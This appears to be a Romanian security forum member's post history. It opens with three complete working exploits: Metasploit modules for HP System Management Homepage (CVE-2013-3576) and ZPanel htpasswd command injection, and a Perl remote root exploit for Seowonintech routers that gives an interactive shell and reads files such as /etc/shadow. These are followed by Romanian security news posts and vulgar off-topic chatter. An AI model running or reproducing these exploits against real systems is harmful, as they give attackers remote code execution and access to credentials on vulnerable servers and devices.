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  1. Author : Metasploit Source : HP System Management Homepage JustGetSNMPQueue Command Injection Code : ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ ## require 'msf/core' class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::CmdStagerTFTP include Msf::Exploit::Remote::HttpClient def initialize(info={}) super(update_info(info, 'Name' => "HP System Management Homepage JustGetSNMPQueue Command Injection", 'Description' => %q{ This module exploits a vulnerability found in HP System Management Homepage. By supplying a specially crafted HTTP request, it is possible to control the 'tempfilename' variable in function JustGetSNMPQueue (found in ginkgosnmp.inc), which will be used in a exec() function. This results in arbitrary code execution under the context of SYSTEM. Please note: In order for the exploit to work, the victim must enable the 'tftp' command, which is the case by default for systems such as Windows XP, 2003, etc. }, 'License' => MSF_LICENSE, 'Author' => [ 'Markus Wulftange', 'sinn3r' #Metasploit ], 'References' => [ ['CVE', '2013-3576'], ['OSVDB', '94191'], ['US-CERT-VU', '735364'] ], 'Payload' => { 'BadChars' => "\x00" }, 'DefaultOptions' => { 'SSL' => true }, 'Platform' => 'win', 'Targets' => [ ['Windows', {}], ], 'Privileged' => false, 'DisclosureDate' => "Jun 11 2013", 'DefaultTarget' => 0)) register_options( [ Opt::RPORT(2381), # USERNAME/PASS may not be necessary, because the anonymous access is possible OptString.new("USERNAME", [false, 'The username to authenticate as']), OptString.new("PASSWORD", [false, 'The password to authenticate with']) ], self.class) end def peer "#{rhost}:#{rport}" end def check cookie = '' if not datastore['USERNAME'].to_s.empty? and not datastore['PASSWORD'].to_s.empty? cookie = login if cookie.empty? print_error("#{peer} - Login failed") return Exploit::CheckCode::Safe else print_good("#{peer} - Logged in as '#{datastore['USERNAME']}'") end end sig = Rex::Text.rand_text_alpha(10) cmd = Rex::Text.uri_encode("echo #{sig}") uri = normalize_uri("smhutil", "snmpchp/") + "&{cmd}&&echo" req_opts = {} req_opts['uri'] = uri if not cookie.empty? browser_chk = 'HPSMH-browser-check=done for this session' curl_loc = "curlocation-#{datastore['USERNAME']}=" req_opts['cookie'] = "#{cookie}; #{browser_chk}; #{curl_loc}" end res = send_request_raw(req_opts) if not res print_error("#{peer} - Connection timed out") return Exploit::CheckCode::Unknown end if res.body =~ /SNMP data engine output/ and res.body =~ /#{sig}/ return Exploit::CheckCode::Vulnerable end Exploit::CheckCode::Safe end def login username = datastore['USERNAME'] password = datastore['PASSWORD'] cookie = '' res = send_request_cgi({ 'method' => 'POST', 'uri' => '/proxy/ssllogin', 'vars_post' => { 'redirecturl' => '', 'redirectquerystring' => '', 'user' => username, 'password' => password } }) if not res fail_with(Exploit::Failure::Unknown, "#{peer} - Connection timed out during login") end # CpqElm-Login: success if res.headers['CpqElm-Login'].to_s =~ /success/ cookie = res.headers['Set-Cookie'].scan(/(Compaq\-HMMD=[\w\-]+)/).flatten[0] || '' end cookie end def setup_stager execute_cmdstager({ :temp => '.'}) end def execute_command(cmd, opts={}) # Payload will be: C:\hp\hpsmh\data\htdocs\smhutil uri = Rex::Text.uri_encode("#{@uri}#{cmd}&&echo") req_opts = {} req_opts['uri'] = uri if not @cookie.empty? browser_chk = 'HPSMH-browser-check=done for this session' curl_loc = "curlocation-#{datastore['USERNAME']}=" req_opts['cookie'] = "#{@cookie}; #{browser_chk}; #{curl_loc}" end print_status("#{peer} - Executing: #{cmd}") res = send_request_raw(req_opts) end def exploit @cookie = '' if not datastore['USERNAME'].to_s.empty? and not datastore['PASSWORD'].to_s.empty? @cookie = login if @cookie.empty? fail_with(Exploit::Failure::NoAccess, "#{peer} - Login failed") else print_good("#{peer} - Logged in as '#{datastore['USERNAME']}'") end end @uri = normalize_uri('smhutil', 'snmpchp/') + "&&" setup_stager end end
  2. Author : Metasploit Source : ZPanel htpasswd Module Username Command Execution Code : ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ ## require 'msf/core' class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient def initialize(info={}) super(update_info(info, 'Name' => "ZPanel htpasswd Module Username Command Execution", 'Description' => %q{ This module exploits a vulnerability found in ZPanel's htpasswd module. When creating .htaccess using the htpasswd module, the username field can be used to inject system commands, which is passed on to a system() function for executing the system's htpasswd's command. Please note: In order to use this module, you must have a valid account to login to ZPanel. An account part of any of the default groups should suffice, such as: Administrators, Resellers, or Users (Clients). By default, there's already a 'zadmin' user, but the password is randomly generated. }, 'License' => MSF_LICENSE, 'Author' => [ 'shachibista', # Original discovery 'sinn3r' # Metasploit ], 'References' => [ ['OSVDB', '94038'], ['URL', 'https://github.com/bobsta63/zpanelx/commit/fe9cec7a8164801e2b3755b7abeabdd607f97906'], ['URL', 'http://forums.zpanelcp.com/showthread.php?27898-Serious-Remote-Execution-Exploit-in-Zpanel-10-0-0-2'] ], 'Arch' => ARCH_CMD, 'Platform' => 'unix', 'Targets' => [ [ 'ZPanel on Linux', {} ] ], 'Privileged' => false, 'DisclosureDate' => "Jun 7 2013", 'DefaultTarget' => 0)) register_options( [ OptString.new('TARGETURI', [true, 'The base path to ZPanel', '/']), OptString.new('USERNAME', [true, 'The username to authenticate as']), OptString.new('PASSWORD', [true, 'The password to authenticate with']) ], self.class) end def peer "#{rhost}:#{rport}" end def check res = send_request_raw({'uri' => normalize_uri(target_uri.path)}) if not res print_error("#{peer} - Connection timed out") return Exploit::CheckCode::Unknown end if res.body =~ /This server is running: ZPanel/ return Exploit::CheckCode::Detected end return Exploit::CheckCode::Safe end def login(base, token, cookie) res = send_request_cgi({ 'method' => 'POST', 'uri' => normalize_uri(base, 'index.php'), 'cookie' => cookie, 'vars_post' => { 'inUsername' => datastore['USERNAME'], 'inPassword' => datastore['PASSWORD'], 'sublogin2' => 'LogIn', 'csfr_token' => token } }) if not res fail_with(Exploit::Failure::Unknown, "#{peer} - Connection timed out") elsif res.body =~ /Application Error/ or res.headers['location'].to_s =~ /invalidlogin/ fail_with(Exploit::Failure::NoAccess, "#{peer} - Login failed") end res.headers['Set-Cookie'].to_s.scan(/(zUserSaltCookie=[a-z0-9]+)/).flatten[0] || '' end def get_csfr_info(base, path='index.php', cookie='', vars={}) res = send_request_cgi({ 'method' => 'GET', 'uri' => normalize_uri(base), 'cookie' => cookie, 'vars_get' => vars }) fail_with(Exploit::Failure::Unknown, "#{peer} - Connection timed out while collecting CSFR token") if not res token = res.body.scan(/<input type="hidden" name="csfr_token" value="(.+)">/).flatten[0] || '' sid = res.headers['Set-Cookie'].to_s.scan(/(PHPSESSID=[a-z0-9]+)/).flatten[0] || '' fail_with(Exploit::Failure::Unknown, "#{peer} - No CSFR token collected") if token.empty? return token, sid end def exec(base, token, sid, user_salt_cookie) fake_pass = Rex::Text.rand_text_alpha(5) cookie = "#{sid}; #{user_salt_cookie}" send_request_cgi({ 'method' => 'POST', 'uri' => normalize_uri(base), 'cookie' => cookie, 'vars_get' => { 'module' => 'htpasswd', 'action' => 'CreateHTA' }, 'vars_post' => { 'inAuthName' => 'Restricted+Area', 'inHTUsername' => ";#{payload.encoded} #", 'inHTPassword' => fake_pass, 'inConfirmHTPassword' => fake_pass, 'inPath' => '/', 'csfr_token' => token } }) end def exploit base = target_uri.path token, sid = get_csfr_info(base) vprint_status("#{peer} - Token=#{token}, SID=#{sid}") user_salt_cookie = login(base, token, sid) print_good("#{peer} - Logged in as '#{datastore['USERNAME']}:#{datastore['PASSWORD']}'") vars = {'module'=>'htpasswd', 'selected'=>'Selected', 'path'=>'/'} cookie = "#{sid}; #{user_salt_cookie}" token = get_csfr_info(base, '', cookie, vars)[0] vprint_status("#{peer} - Token=#{token}, SID=#{sid}") print_status("#{peer} - Executing payload...") exec(base, token, sid, user_salt_cookie) end end
  3. Author : Todor Donev Source : Seowonintech Devices - Remote root Exploit Code : #!/usr/bin/perl # # [+] Seowonintech all device remote root exploit v2 # ===================================================== # author: | email: # Todor Donev (latin) | todor dot donev # Òîäîð Äîíåâ (cyrillic) | @googlemail.com # ===================================================== # type: | platform: | description: # remote | linux | attacker can get root # hardware | seowonintech | access on the device # ===================================================== # greetings to: # Stiliyan Angelov,Tsvetelina Emirska,all elite # colleagues and all my friends that support me. # ===================================================== # warning: # Results about 37665 possible vulnerabilities # from this exploit. # ===================================================== # shodanhq dork: # thttpd/2.25b 29dec2003 Content-Length: 386 Date: 2013 # ===================================================== # P.S. Sorry for buggy perl.. # 2o13 Hell yeah from Bulgaria, Sofia # # Stop Monsanto Stop Monsanto Stop Monsanto # # FREE GOTTFRID SVARTHOLM WARG FREE # GOTTFRID SVARTHOLM WARG is THEPIRATEBAY co-founder # who was sentenced to two years in jail by Nacka # district court, Sweden on 18.06.2013 for hacking into # computers at a company that manages data for Swedish # authorities and making illegal online money transfers. use LWP::Simple qw/$ua get/; my $host = $ARGV[0] =~ /^http:\/\// ? $ARGV[0]: 'http://' . $ARGV[0]; if(not defined $ARGV[0]) { usg(); exit; } print "[+] Seowonintech all device remote root exploit\n"; $diagcheck = $host."/cgi-bin/diagnostic.cgi"; $syscheck = $host."/cgi-bin/system_config.cgi"; $res = $ua->get($diagcheck) || die "[-] Error: $!\n"; print "[+] Checking before attack..\n"; if($res->status_line != 200){ print "[+] diagnostic.cgi Status: ".$res->status_line."\n"; }else{ print "[o] Victim is ready for attack.\n"; print "[o] Status: ".$res->status_line."\n"; if(defined $res =~ m{selected>4</option>}sx){ print "[+] Connected to $ARGV[0]\n"; print "[+] The fight for the future Begins\n"; print "[+] Exploiting via remote command execution..\n"; print "[+] Permission granted, old friend.\n"; &rce; }else{ print "[!] Warning: possible vulnerability.\n"; exit; } } $res1 = $ua->get($syscheck) || die "[-] Error: $!\n"; if($res1->status_line != 200){ print "[+] system_config.cgi Status: ".$res1->status_line."\n"; exit; }else{ print "[+] Trying to attack via remote file disclosure release.\n"; if(defined $syscheck =~ s/value=\'\/etc\/\'//gs){ print "[+] Victim is ready for attack.\n"; print "[+] Connected to $ARGV[0]\n"; print "[o] Follow the white cat.\n"; print "[+] Exploiting via remote file dislocure..\n"; print "[+] You feeling lucky, Neo?\n"; &rfd; }else{ print "[!] Warning: Possible vulnerability. Believe the unbelievable!\n"; exit; } } sub rfd{ while(1){ print "# cat "; chomp($file=<STDIN>); if($file eq ""){ print "Enter full path to file!\n"; } $bug = $host."/cgi-bin/system_config.cgi?file_name=".$file."&btn_type=load&action=APPLY"; $data=get($bug) || die "[-] Error: $ARGV[0] $!\n"; $data =~ s/Null/File not found!/gs; if (defined $data =~ m{rows="30">(.*?)</textarea>}sx){ print $1."\n"; } } } sub rce{ while(1){ print "# "; chomp($rce=<STDIN>); $bug = $host."/cgi-bin/diagnostic.cgi?select_mode_ping=on&ping_ipaddr=-q -s 0;".$rce.";&ping_count=1&action=Apply&html_view=ping"; $rce =~ s/\|/\;/; if($rce eq ""){print "enter Linux command\n";} if($rce eq "clear"){system $^O eq 'MSWin32' ? 'cls' : 'clear';} if($rce eq "exit" || $rce eq "quit"){print "There is no spoon...\n"; exit;} $data=get($bug) || die "[-] Error: $!\n"; if (defined $data =~ m{(\s.*) Content-type:}sx){ $result = substr $1, index($1, ' loss') or substr $1, index($1, ' ms'); $result =~ s/ loss\n//; $result =~ s/ ms\n//; print $result; } } } sub usg { print " [+] Seowonintech all device remote root exploit\n"; print " [!] by Todor Donev todor dot donev @ googlemail.com\n"; print " [?] usg: perl $0 <victim>\n"; print " [?] exmp xpl USG: perl $0 \n"; print " [1] exmp xpl RCE: # uname -a \n"; print " [2] exmp xpl RFD: # cat /etc/webpasswd or /etc/shadow, maybe and /etc/passwd \n"; }
  4. Matt

    Fun stuff

    Spiritul 666 al lui polonic inca e viu..
  5. unguru = lolzs ala ? Apoi forumu meu ok
  6. Majoritatea companiilor subestimeaza numarul programelor malware care apar zilnic, releva un sondaj derulat la nivel mondial, la care au participat peste 2000 de profesionisti IT. Aproape 200.000 de noi mostre malware apar zilnic in luna, potrivit firmei de securitate Kaspersky Lab, care a comandat sondajul. Solicitandu-li-se sa faca estimari cu privire la acest numar, 90% dintre respondenti au indicat un numar mai scazut de malware, 4% au apreciat ca numarul exemplarelor malware care apar zilnic este mai ridicat si doar 6% dintre acestia au oferit o estimare corecta. Cel mai mare grad al constientizarii pericolelor malware a fost inregistrat in randul profesionistilor IT din Orientul Mijlociu, care au oferit estimari corecte in proportie de 24%, potrivit sondajului Global Corporate IT Security Risks 2013. La 4%, cel mai mic nivel al constientizarii malware a fost inregistrat in Rusia. In alte regiuni, inclusiv in America de Nord si de Sud, Europa de Vest si Asia-Pacific, procentajul companiilor cu estimari precise a variat intre 5% sii 7%, potrivit studiului B2B International. De asemenea, studiul a constatat ca, in medie, 66% dintre companii au experimentat cel putin un atac implicand malware in ultimele 12 luni, companiile cel mai frecvent atacate fiind cele din America de Sud (72%), Rusia (71%), America de Nord (70%), Asia-Pacific (68%) si Europa de Vest (63%). Regiunile cele mai des vizate de atacuri corepund celor care au demonstrat niveluri sccazute ale educatiei cu privire la numarul noilor amenintari malware. Potrivit rezultatelor sondajului, capacitatea unei companii de a evalua corect volumul zilnic malware nu reprezinta neaparat un indicator al pregatirii pentru a contracara atacurile cibernetice. Cu toate acestea este rezonabil a considera ca organizatiile mai bine informate sunt mai capabile sa evalueze ricurile si sa faca alegerile potrivite atunci cand vine vorba despre protejarea infrastructurii IT, mai releva raportul. Sursa: www.computerweekly.com
  7. "we ask that you do not disclose your finding to the public or to the media while we implement a fix." Ai dracu tot ei iti dau ordine
  8. Nu inteleg de ce pula mea veniti toti sa va faceti reclama aici?Mars
  9. Din ce stiu da.Daca nu rezolvi exista oricum , Regia : Platesti 10 lei pe zi , iar din regie pana la Universitate ajungi cu Metroul.
  10. Symantec a lansat si ofera gratuit un ebook deosebit de interesant (Symantec 2013 Internet Security Threat Report) despre amenintarile informatice din 2012, raportat la anii precedenti. Sunt descrise in amanunt, alaturi de grafice si tabele ilustrative toate formele de malware si amenintari care pot viza un utilizator casnic sau o companie. Ai 58 de pagini de informatii de calitate si le poti obtine gratuit accesand link-ul: Symantec 2013 Internet Security Threat Report Free Report Source : FaraVirusi.Com
  11. Si care e diferentra dintre un user care intra ca acum , fara nicio intrebare si userul care atunci cand va vedea intrebarile va da copy/paste din regulament si va intra la fel de usor ? Raspunsul e maxim un minut.
  12. Doar 10 intrebari ? Dar ce pula mea e coaie aici vrei ca userii noi sa dea testul de Cambridge? Dupa ce ca vine generatie din ce in ce mai proasta , daca le mai pui si intrebari.Contra / S-a mai sugerat ideea asta si n-a fost implementata.
  13. Malwarebytes Anti-Exploit Beta a fost lansat – Protejeaza-te impotriva vulnerabilitatilor de securitate. Exploit-urile care afecteaza programe celebre: Adobe Flash, Java, Adobe Acrobat, browserele web sau chiar sistemul de operare Windows sunt si vor fi mereu raspandite. Pentru ca producatorul lanseaza actualizarile abia dupa ce exploit-ul a fost utilizat in masa si uneori update-urile de securitate se lasa mult asteptate, Malwarebytes Anti-Exploit poate fi solutia. http://img96.imageshack.us/img96/3707/jh8i.jpg Protejeaza cu succes browserele web, Java, Adobe Reader, Foxit Reader, produsele Microsoft Office, Winamp, VLC Player, QuickTime player, Windows Media Player si Windows Script Host. Programul a fost lansat dupa achizitionarea ExploitShield si protejeaza impotriva diverselor tehnici de preluare a controlului asupra unui PC vulnerabil. Procesul activ mbae.exe utilizeaza circa 4 MB de RAM in timpul rularii, iar testarea Beta va ofera posibilitatea evaluarii gratuite a acestui program excelent. Pentru a-l descarca si a raporta eventualele probleme, accesati: Malwarebytes Anti-Exploit Help - Malwarebytes Forum Source FaraVirusi.Com
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  14. WordPress 3.5 a fost o actualizare importanta a celebrei platforme de blogging. Dupa orice versiune majora a unui produs, vin si micile retusari. Astfel a fost lansata astazi versiunea 3.5.2, care remediaza cateva probleme importante de securitate: Blocking server-side request forgery attacks, which could potentially enable an attacker to gain access to a site. Disallow contributors from improperly publishing posts, reported by Konstantin Kovshenin, or reassigning the post’s authorship, reported by Luke Bryan. An update to the SWFUpload external library to fix cross-site scripting vulnerabilities. Reported by mala and Szymon Gruszecki. (Developers: More on SWFUpload here.) Prevention of a denial of service attack, affecting sites using password-protected posts. An update to an external TinyMCE library to fix a cross-site scripting vulnerability. Reported by Wan Ikram. Multiple fixes for cross-site scripting. Reported by Andrea Santese and Rodrigo. Avoid disclosing a full file path when a upload fails. Reported by Jakub Galczyk. Pentru alte detalii privind si restul modificarilor din aceasta versiune accesati site-ul oficial: WordPress › WordPress 3.5.2 Maintenance and Security Release Puteti descarca WordPress 3.5.2 de mai jos sau direct din Panoul de control al blogului vostru: WordPress › Download WordPress Source FaraVirusi.Com
  15. Symantec anunta lansarea testarii Beta pentru produsele Norton din generatia 2014 (v. 21): Norton Antivirus, Norton Internet Security, Norton 360. Lista modificarilor este destul de ambigua si generala: Enhanced protection and performance Compatibility with Windows 8 Norton’s exclusive, patented layers of protection that work together to keep you safe from even the sneakiest threats – stopping them before they reach you or your PC so you have peace of mind when you share files and go online, without having to wait for updates. Browser and Personal Identity protection: Protects you from identity thieves, phishers, and dangerous websites, so you can go anywhere online safely. Pentru a descarca Norton Antivirus 2014, Norton Internet Security 2014 si Norton 360 v. 21, accesati: Norton Beta Center – Download 2014 Beta Antivirus Software | Norton Source FaraVirusi.Com
  16. Emsisoft utilizeaza doua motoare de scanare antivirus: BitDefender si motorul propriu Emsisoft. Produsul Emsisoft Anti-Malware are astfel o detectie si protectie superioara. Conform ultimului test AV-Comparatives.org pe luna martie 2013, detectia Emsisoft a fost de 99.3%, la fel ca BitDefender sau BullGuard, insa rata alarmelor false a fost de 38, mult peste medie. Astfel, se pare ca nu beneficiaza de motorul propriu decat in ceea ce priveste alarmele false, deoarece detectia nu este superioara BitDefender, ci chiar identica. De curand a fost lansata versiunea 8 BETA, ce aduce urmatoarele imbunatatiri: Major signature database cleanup and reorganization to reduce update traffic and memory usage by about 80 MB. Greatly improved malware cleaning engine for more thorough and safer removal of infections. Separation of “Guard” logs into individual File Guard, Behavior Blocker and Surf Protection log sections. New Scan logs overview. New date column in custom host rules list. Dozens of minor improvements to usability. Pentru cei interesati, puteti descarca Emsisoft Anti-Malware 7 folosind link-ul de mai jos, bifati optiunea “Beta updates” dupa instalare si veti primi automat ultima versiune 8 BETA : Free Emsisoft Anti-Malware Download - Antivirus, Antimalware, Antispyware Source : FaraVirusi.Com
  17. S-a lansat McAfee Total Protection 6.8 Beta pentru Windows si doritorii il pot testa gratuit. Iata noutatile: Touch Friendly UI: Intuitive and Informative with access to all main features from home screen. New Virusscan Engine Technology: MTP 6.8 incorporates a new Virusscan Engine technology to manage threats and improve scan performance times. This technology includes new Heiristics which aid in the discovery of potential Malware, that is not yet discovered or included in our DAT files. Vulnerability Scanner: MTP 6.8 can detect vulnerabilities and/or weaknesses in the top 25 applications and provide remediation by directing the user to the latest updates for these applications. Improved Anti-Spam Technology: Anti-spam engine will integrate with new technology that will enhance anti-spam ability to block spam and reduce false positives. URL Filtering and Blocking: This feature provides enhanced web protection by allowing the filtering and blocking of URL based on IP reputation. Enhanced Firewall Leak Detection: When this feature is turned on, it will allow enhanced protection from exploits that particularly target exploits in operating system and processes. Rich Information about Bad IP’s: This is an enhancement to NetGuard functionality. When certain IP connections are blocked by the firewall, users will be alerted and will be provided with a url where they can get rich information about the blocked IP address, for example: location, domain, attributes that make it insecure etc. Improved History and Log Page: The history and logs page in the security center UI has been completely re-designed allowing easy access to latest events. This page also cleanly categorizes events and provides rich information about each event. Users can filter on the categories under Activity as shown in the second screenshot below and view the details of each activity by expanding on the activity under activity drawer. Improved Security Reports: The Security report has been completely re-designed. It not only captures useful information about how the product has been protecting consumers but captures it in a visually stimulating way providing appropriate images and links. Quick Clean & Shredder: QuickClean has been redesigned with improved user experience and richly integrated within the MSC. Smart Timer Control: Users can now enable/disable the Smart Timer function if so desired. The Smart Timer is used to establish the machines current usage and activity, then determine whether or not to perform operations such as scheduled scanning. Improved Windows 7 Feature Adoption: Product allows user to perform right-click scan on folders. With WSS 12.8 release, user can perform right-click scan on Windows 7 libraries as well. Option for Full Un-Install: Un-installation of the product will provide user with an additional option to perform complete and clean un-install. This option is useful in situations where user will not be re-installing McAfee product again on the same system. Not choosing this option and going with default un-install option allows for easy re-installs and as pertinent product set up related settings are retained upon un-install. SiteAdvisor 3.5 is now stronger and faster: SiteAdvisor 3.5 for Windows incorporates significant exploit protection enhancements as well as browser performance improvements. SiteAdvisor 3.6 is now available in select regions: When you shop online, nothing beats getting a great deal and when it’s time to click “buy”, nothing says trust better than the McAfee SECURE trustmark. SiteAdvisor 3.6 for Windows is piloting a new feature called Safe Shopping Rewards – a way for you to actually earn cash back from Ebates when you shop on select McAfee SECURE sites. This feature will be initially limited to US and Canada in English on Windows 7 Operating system. Pentru a descarca si testa McAfee Total Protection 6.8 Beta accesati: Please Enable Cookies | Home & Home Office Beta | McAfee Source : FaraVirusi.Com
  18. Matt

    Fun stuff

    Ce e in neregula la acesta poza ? hate.me n-are voie sa posteze.
  19. Edward Snowden, fostul consultant IT care a dezvaluit informatii despre programele americane de interceptare a comunicatiilor, a primit consultanta judiciara din partea reprezentantilor site-ului WikiLeaks, in vederea obtinerii azilului politic. Fondatorul WikiLeaks, Julian Assange, indemnase comunitatea internationala, sambata, sa fie "alaturi de" Edward Snowden, acuzandu-l pe presedintele SUA, Barack Obama, ca "a tradat o generatie de tineri intelectuali". Julian Assange - refugiat de un an in ambasada Ecuadorului din Londra si al carui site, WikiLeaks, a publicat sute de mii de documente secrete americane - anuntase joi ca se afla in contact cu reprezentanti ai lui Edward Snowden cu scopul de a-l ajuta sa obtina azil in Islanda. Snowden a plecat legal din Hong Kong Guvernul din Hong Kong a confirmat, duminica, plecarea fostului consultant informatic al NSA Edward Snowden. "Domnul Snowden a parasit duminica Hong Kong-ul in mod voluntar, plecand in mod legal in alta tara", a declarat, conform AFP, un purtator de cuvant al Guvernului local, precizand ca autoritatile "nu primisera inca informatii care sa justifice arestarea" tanarului american. Potrivit presei chineze, Edward Snowden a parasit Hong Kong -ul duminica, la bordul unui avion al companiei Aeroflot cu destinatia Moscova. Avionul comercial care il transporta pe Snowden urmeaza sa aterizeze duminica dupa-amiaza pe aeroportul Seremetievo din Moscova, insa nu se stie daca aceasta va fi destinatia finala a fostului consultant al Agentiei Nationale pentru Securitate din Statele Unite, scrie ziarul South China Morning Post. Edward Snowden, in varsta de 29 de ani, fugise in Hong Kong in mai, dupa ce a dezvaluit existenta a doua programe secrete, unul referitor la colectarea datelor registrelor telefonice, incepand din 2006, iar celalalt, Prism, vizand retele de socializare. Snowden a fost inculpat vineri, in Statele Unite, pentru acte de spionaj, iar justitia americana a cerut autoritatilor din Hong Kong sa il aresteze. Sursa Business24.Ro
  20. Matt

    Fun stuff

  21. Guvenul american pirateaza companiile de telefonie mobila chineze pentru a intercepta milioane de mesaje trimise prin SMS, a afirmat fostul agent al CIA Edward Snowden intr-un articol publicat sambata de cotidianul South China Morning Post din Hong Kong, citat de AFP. SUA au piratat, de asemenea, prestigioasa universitate Tsinghua din Beijing si operatorul de fibre optice pentru Asia-Pacific Pacnet, potrivit lui Snowden, citat de jurnal. Ex-agentul CIA, care a fost si consultant al Agentiei Securitatii Nationale (NSA) americane, s-a refugiat in Hong Kong dupa ce a divulgat programe americane de supraveghere a comunicatiilor, ceea ce i-a atras vineri inculparea pentru spionaj in SUA. "NSA face tot felul de lucruri, ca de pilda piratarea companiilor de telefonie mobila chineze pentru a va fura toate SMS-urile", a declarat Snowden intr-un interviu acordat in 12 iunie cotidianului chinez, dar din care a aparut doar acest pasaj intr-un articol publicat sambata pe site-ul internet al acestuia. Snowden "sustine ca detine probe pentru tot ce afirma", indica ziarul fara sa citeze documentul care etaleaza aceste acuzatii. Potrivit statisticilor oficiale citate de jurnal, chinezii si-au trimis aproape 900 de miliarde de SMS-uri in 2012, adica cu 2,1 % mai mult decat in 2011. Articolul nu divulga cum are loc presupusa piratare, dar arata ca experti chinezi in securitatea cibernetica au intrat in alerta de mult timp in urma unor atacuri "clandestine" efectuate cu echipamente straine. In acelasi articol, dl Snowden afirma ca universitatea Tsinghua din Beijing, institutie prestigioasa care ii numara printre absolventii sai pe actualul presedinte chinez Xi Jinping si pe fostul presedinte Hu Jintao, a fost tinta unei piratari masive din partea SUA. Sursa Business24.Ro
  22. Matt

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    Plecati in pula mea de aici cu sistemul vostru revolutionar daca mai vreti sa il aveti.
  23. Matt

    Fun stuff

    Ce dracu' tot fuge
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